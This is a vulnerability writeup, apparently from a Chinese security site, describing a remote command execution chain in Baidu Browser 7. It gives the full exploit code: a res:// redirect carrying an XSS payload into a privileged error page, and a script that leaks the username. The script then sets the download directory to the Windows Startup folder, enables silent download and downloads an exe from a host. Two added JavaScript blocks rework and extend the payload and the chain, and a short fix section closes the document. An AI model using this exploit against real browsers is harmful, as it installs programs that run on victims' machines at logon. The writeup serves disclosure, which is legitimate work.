Baidu Browser Remote Command Execution 5

Source: Internet
Author: User

1. First, open a local page in Baidu Browser, for example file:///C:/xxxxxx. An error page is shown. Look at location.href in the F12 console: the URL has been rewritten to data:text/html,biduwebdata



Why test this at all? Because in Baidu Browser 6 the data:text/html,biduwebdata page had an XSS, so I wanted to check whether data:text/html,biduwebdata still has it in version 7. Notice that the URL we entered is echoed on the page. Is it unescaped there?

So test with the following code from the bdbrowser domain (the test has to be run there because an http page cannot be redirected to the file domain):

location.href='file:///C:/xxxxxx#">'

The alert pops up.

2. The second question: data:text/html,biduwebdata is a data: URL. Is that URL privileged? The answer: in Baidu Browser 6 it was not, but in the latest version the data:text/html,biduwebdata URL is privileged, while other data:xxx URLs are not.

3. So we already have an XSS in a privileged domain. The remaining problem: how do we get from the http domain to the file domain?

A. Redirect to a non-existent protocol?

It does not produce the same effect as the file domain.

B. The about: protocol just opens a blank page.

C. There is also the common res:// protocol. Let's try it:

location.href='res:///C:/xxxxxx#">'

As shown, the res: protocol produces the same effect as the file: protocol, and an http page can redirect to a res: URL.

4. So we have the XSS. How do we turn it into command execution? I retested some APIs that had been examined before, such as skin (theme) download and plug-in download; those now carry certain security restrictions. However, one feature stands out:

It involves two parts:



First, silent download: a specified program can be downloaded into the download directory with no user interaction.

Second, the download directory setting.

If we enable silent download, point the download directory at the user's Startup folder, and then make the browser download an exe, the exe ends up in the Startup folder and is executed at the next logon.



5. With an XSS in a privileged domain, the idea above is not hard to implement. The code follows, with comments.



A. Redirect to res://..., trigger the XSS, and load baidupoc5.js:

<html>
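The echo bug used in steps 1 to 3 and the URL the redirect page of step 5A navigates to, as an added JavaScript example (not the writeup's own page or script). One assumption drives it: the local-file error page echoes location.href, fragment included, into a double-quoted attribute without escaping. That context is inferred from the `#">` payload above, not from the browser's source; the error-page markup, the host 192.168.1.13 and the script name are constructed for illustration.

```javascript
// Added example (not from the original writeup). It models the bug used in steps
// 1 to 3 and builds the URL the redirect page of step 5A would navigate to.
// Assumption: the local-file error page echoes location.href (fragment included)
// into a double-quoted attribute without escaping; that context is inferred from
// the writeup's `#">` payload, not from the browser's source.

// Vulnerable template: the URL is concatenated straight into an attribute value.
function vulnerableErrorPage(url) {
  return '<div class="error" data-url="' + url + '">Cannot open page</div>';
}

// Escape the five characters that matter in text and attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Hardened template: identical markup, but the URL is escaped first.
function hardenedErrorPage(url) {
  return '<div class="error" data-url="' + escapeHtml(url) + '">Cannot open page</div>';
}

// The payload lives in the fragment: `#` keeps it out of the path the browser
// tries to open, so the error page is still produced, while `">` closes the
// attribute the URL is echoed into and the rest is parsed as markup.
// `scheme` is "file" (only reachable from the bdbrowser domain) or "res"
// (reachable from http), as found in step 3.
function buildPayloadUrl(scheme, localPath, scriptSrc) {
  return scheme + ':///' + localPath + '#"><script src="' + scriptSrc + '"></script>';
}

// Crude check used only by this example: blank out every quoted attribute value,
// then see whether a <script ...> start tag is left over as real markup.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html.replace(/"[^"]*"/g, '""'));
}

// Constructed values: the placeholder path from the writeup and an assumed LAN
// host serving the second-stage script.
const PAYLOAD = buildPayloadUrl('res', 'C:/xxxxxx', 'http://192.168.1.13/baidupoc5.js');

function demo() {
  return {
    payload: PAYLOAD,
    vulnerable: containsScriptTag(vulnerableErrorPage(PAYLOAD)),
    hardened: containsScriptTag(hardenedErrorPage(PAYLOAD))
  };
}
```

In the browser the redirect page would do nothing more than `location.href = PAYLOAD`; the echoed `<script>` then runs inside the privileged res: error page and pulls in baidupoc5.js. With the escaped template the same URL is inert, which is the fix the Solution section asks for.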





B. The baidupoc5.js code is as follows:

var isWin7 = /NT\s+6/.test(navigator.userAgent);   // NT 6.x (Vista/7/8); anything else is treated as XP

/* Get the username: the theme_apply callback returns the local path the skin was saved to */
function getUserNameCallback(id, res) {
    console.log(arguments);
    if (!res) {
        console.log("download skin error");
        return;
    }
    var data = JSON.parse(res);
    var path = data.body.path;
    var d = path.substring(0, 1);                       // drive letter
    var user = isWin7
        ? (path.match(/\\Users\\([^\\]+)\\/) || ["", ""])[1]
        : (path.match(/\\Documents and Settings\\([^\\]+)\\/) || ["", ""])[1];
    console.log(path);
    console.log(user);
    setDownloadDir(d, user);
}

/* Set the download directory to the user's Startup folder */
function setDownloadDir(d, user) {
    var win7 = d + ":/Users/" + user + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/";
    var xp = d + ":/Documents and Settings/" + user + "/「开始」菜单/程序/启动/";   // Chinese-locale XP: "Start" menu\Programs\Startup
    var dir = isWin7 ? win7 : xp;
    window.external.startRequest(1058, "set_string_pref", "", "[\"download_default_directory\", \"" + dir + "\"]");
    console.log("download directory");
    setTimeout(function () { setDownloadSilent(); }, 100);
}

/* Enable silent download (no save dialog) */
function setDownloadSilent() {
    window.external.startRequest(1059, "set_boolean_pref", "", "[\"download_auto_save\", true]");
    console.log("download settings");
    setTimeout(function () { startDownload(); }, 100);
}

/* Start the download: the exe now lands in the Startup folder */
function startDownload() {
    console.log("download exe");
    location.href = "http://192.168.1.13/calc.exe";
}

/* Entry: apply a theme so that the callback leaks a local path containing the username */
function main() {
    window.external.startRequest(1057, "theme_apply", "getUserNameCallback",
        "[{\"md5\":\"0a696bf6144f37186eb2ba4b637c97da\",\"id\":\"nickname\"," +
        "\"src\":\"http://webimg.br.baidu.com/odin/201410/0a696bf6144f37186eb2ba4b637c97da.jpg\"," +
        "\"thumb\":\"http://webimg.br.baidu.com/odin/201410/a57d9c085d1cca1c16a1265f0bea040e.jpg\"," +
        "\"subject\":\"\",\"tone\":0,\"tag\":\"\",\"desc\":\"\",\"from\":0,\"themeId\":\"41\"," +
        "\"name\":\"bridge night scene\",\"category\":\"featured\",\"position\":4}]");
}

main();

The code above was tested on Windows 7, and also on XP.
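The username-leak-to-Startup-folder chain of steps 4 and 5, as an added JavaScript example rather than the writeup's script. The request ids (1057/1058/1059), method names and pref names are those used in baidupoc5.js above; the profile layouts, the XP locale table, the sample paths and the fake startRequest recorder are assumptions constructed here. It goes a little beyond the original: the profile layout is read from the leaked path instead of the User-Agent, the XP folder name is looked up per locale, the argument strings are built with JSON.stringify, and the chain refuses to write a pref when it cannot derive the directory.

```javascript
// Added example (not the writeup's script). It derives the victim's Startup
// folder from a path leaked by the theme_apply callback and builds the three
// window.external.startRequest calls of steps 4 and 5 as data. Request ids,
// method names and pref names come from baidupoc5.js above; the profile
// layouts, the XP locale table, the sample paths and the fake recorder used
// in the usage section are assumptions constructed for this example.

// Startup folder relative to the user profile. NT 6.x and later keep it under
// AppData\Roaming; XP keeps it under a localized "Start Menu" folder, so the
// XP name depends on the system locale (the writeup targets a Chinese XP).
const STARTUP_SUBPATH = {
  users: 'AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/',
  xp: {
    'en-US': 'Start Menu/Programs/Startup/',
    'zh-CN': '「开始」菜单/程序/启动/'   // "Start" menu\Programs\Startup
  }
};

// Pull "<drive>:\<Users|Documents and Settings>\<user>\" out of any path under
// the profile. Inferring the layout from the path instead of the User-Agent
// (the writeup's /NT\s+6/ test) also covers Windows 8.1/10 profiles.
// Returns null when the path is not inside a user profile.
function parseProfile(path) {
  const m = /^([A-Za-z]):[\\\/]+(Users|Documents and Settings)[\\\/]+([^\\\/]+)[\\\/]/.exec(path);
  if (!m) return null;
  return { drive: m[1], layout: m[2] === 'Users' ? 'users' : 'xp', user: m[3] };
}

// Absolute Startup folder of the profile that owns `path`, or null.
function startupDirFromPath(path, xpLocale) {
  const p = parseProfile(path);
  if (!p) return null;
  const sub = p.layout === 'users' ? STARTUP_SUBPATH.users : STARTUP_SUBPATH.xp[xpLocale || 'en-US'];
  if (!sub) return null;                    // XP locale we have no folder name for
  const root = p.layout === 'users' ? 'Users' : 'Documents and Settings';
  // Forward slashes: Windows accepts them and they need no escaping in JSON.
  return p.drive + ':/' + root + '/' + p.user + '/' + sub;
}

// The theme_apply callback receives a JSON string; the leaked path sits at body.path.
function leakedPathFromCallback(res) {
  if (!res) return null;
  try {
    const p = JSON.parse(res).body.path;
    return typeof p === 'string' ? p : null;
  } catch (e) {
    return null;
  }
}

// The privileged-API sequence. JSON.stringify builds the argument strings, so the
// result is always valid JSON whatever the path contains. Returns null instead of
// writing a pref when the directory cannot be derived.
function buildChain(leakedPath, exeUrl, xpLocale) {
  const dir = startupDirFromPath(leakedPath, xpLocale);
  if (!dir) return null;
  return [
    { id: 1058, method: 'set_string_pref',  callback: '', args: JSON.stringify(['download_default_directory', dir]) },
    { id: 1059, method: 'set_boolean_pref', callback: '', args: JSON.stringify(['download_auto_save', true]) },
    { navigate: exeUrl }
  ];
}

// Run the chain against anything exposing startRequest(id, method, callback, args):
// window.external in the browser, a recorder in tests. The final navigation is
// returned instead of performed so the function has no side effects of its own.
function runChain(chain, external) {
  let navigateTo = null;
  for (const step of chain) {
    if (step.navigate) { navigateTo = step.navigate; continue; }
    external.startRequest(step.id, step.method, step.callback, step.args);
  }
  return navigateTo;
}

// Constructed samples: what the callback might hand back on a Win7 and on an XP box.
const SAMPLE_WIN7_PATH = 'C:\\Users\\alice\\AppData\\Local\\Temp\\0a696bf6144f37186eb2ba4b637c97da.jpg';
const SAMPLE_XP_PATH = 'D:\\Documents and Settings\\bob\\Local Settings\\Temp\\skin.jpg';
const SAMPLE_CALLBACK_RES = JSON.stringify({ body: { path: SAMPLE_WIN7_PATH } });
```

In the browser the sequence is `var nav = runChain(buildChain(leakedPathFromCallback(res), 'http://192.168.1.13/calc.exe'), window.external); location.href = nav;` from inside the theme_apply callback. The writeup's script puts 100 ms setTimeout delays between the two pref writes and the navigation; this version leaves that pacing to the caller so that the chain itself can be tested offline against a recorder.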

Solution:

Fix the XSS in the data:text/html,biduwebdata page.

When the user download directory is changed, the browser should require some user interaction, so that an XSS in a privileged domain cannot change this setting on its own.
